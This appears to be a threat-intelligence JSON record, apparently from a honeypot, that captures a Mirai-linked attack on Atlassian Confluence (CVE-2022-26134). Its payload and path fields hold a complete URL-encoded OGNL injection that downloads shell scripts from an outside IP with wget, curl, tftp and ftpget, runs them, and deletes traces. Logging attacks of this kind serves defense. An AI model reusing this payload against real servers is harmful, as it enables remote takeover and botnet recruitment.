-
Notifications
You must be signed in to change notification settings - Fork 6
/
2022-06-06_Mirai_CVE-2022-26134
33 lines (33 loc) · 3.35 KB
/
2022-06-06_Mirai_CVE-2022-26134
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
{
"query": "213.202.230.64",
"total": 241,
"events": [
{
"port": 443,
"protocol": "tcp",
"results": [
{
"data": {
"payload": "GET /%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22cd%20/tmp%20%7C%7C%20cd%20/var/run%20%7C%7C%20cd%20/mnt%20%7C%7C%20cd%20/root%20%7C%7C%20cd%20/;%20wget%20http://15.204.7.101/ohsitsvegawellrip.sh;%20curl%20-O%20http://15.204.7.101/ohsitsvegawellrip.sh;%20chmod%20777%20ohsitsvegawellrip.sh;%20sh%20ohsitsvegawellrip.sh;%20tftp%2015.204.7.101%20-c%20get%20ohsitsvegawellrip.sh;%20chmod%20777%20ohsitsvegawellrip.sh;%20sh%20ohsitsvegawellrip.sh;%20tftp%20-r%20ohsitsvegawellrip2.sh%20-g%2015.204.7.101;%20chmod%20777%20ohsitsvegawellrip2.sh;%20sh%20ohsitsvegawellrip2.sh;%20ftpget%20-v%20-u%20anonymous%20-p%20anonymous%20-P%2021%2015.204.7.101%20ohsitsvegawellrip1.sh%20ohsitsvegawellrip1.sh;%20sh%20ohsitsvegawellrip1.sh;%20rm%20-rf%20ohsitsvegawellrip.sh%20ohsitsvegawellrip.sh%20ohsitsvegawellrip2.sh%20ohsitsvegawellrip1.sh;%20rm%20-rf%20*h%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/ HTTP/1.1\\r\\nHost: [REDACTED]\\r\\nUser-Agent: python-requests/2.27.1\\r\\nAccept-Encoding: gzip, deflate\\r\\nAccept: */*\\r\\nConnection: keep-alive\\r\\n\\r\\n",
"sha256": "e0997a47cc5709f1556f6282e9cf01eb1d23c921036e35dc4640b9a0cf5b13d5",
"extra": {
"http": {
"path": "/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22cd%20/tmp%20%7C%7C%20cd%20/var/run%20%7C%7C%20cd%20/mnt%20%7C%7C%20cd%20/root%20%7C%7C%20cd%20/;%20wget%20http://15.204.7.101/ohsitsvegawellrip.sh;%20curl%20-O%20http://15.204.7.101/ohsitsvegawellrip.sh;%20chmod%20777%20ohsitsvegawellrip.sh;%20sh%20ohsitsvegawellrip.sh;%20tftp%2015.204.7.101%20-c%20get%20ohsitsvegawellrip.sh;%20chmod%20777%20ohsitsvegawellrip.sh;%20sh%20ohsitsvegawellrip.sh;%20tftp%20-r%20ohsitsvegawellrip2.sh%20-g%2015.204.7.101;%20chmod%20777%20ohsitsvegawellrip2.sh;%20sh%20ohsitsvegawellrip2.sh;%20ftpget%20-v%20-u%20anonymous%20-p%20anonymous%20-P%2021%2015.204.7.101%20ohsitsvegawellrip1.sh%20ohsitsvegawellrip1.sh;%20sh%20ohsitsvegawellrip1.sh;%20rm%20-rf%20ohsitsvegawellrip.sh%20ohsitsvegawellrip.sh%20ohsitsvegawellrip2.sh%20ohsitsvegawellrip1.sh;%20rm%20-rf%20*h%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/",
"header_order_hash": "069c492ae6117efcda8a7d5788841bc4",
"header_order": "host,user_agent,accept_encoding,accept,connection",
"method": "GET",
"version": "1.1",
"headers": {
"host": "[REDACTED]",
"connection": "keep-alive",
"user-agent": "python-requests/2.27.1",
"all": "{\"host\": \"[REDACTED]\", \"connection\": \"keep-alive\", \"accept-encoding\": \"gzip, deflate\", \"user-agent\": \"python-requests/2.27.1\", \"accept\": \"*/*\"}"
}
}
},
"tags": [
"MALIGN",
"HTTP_SCANNER",
"MALICIOUS"
]
}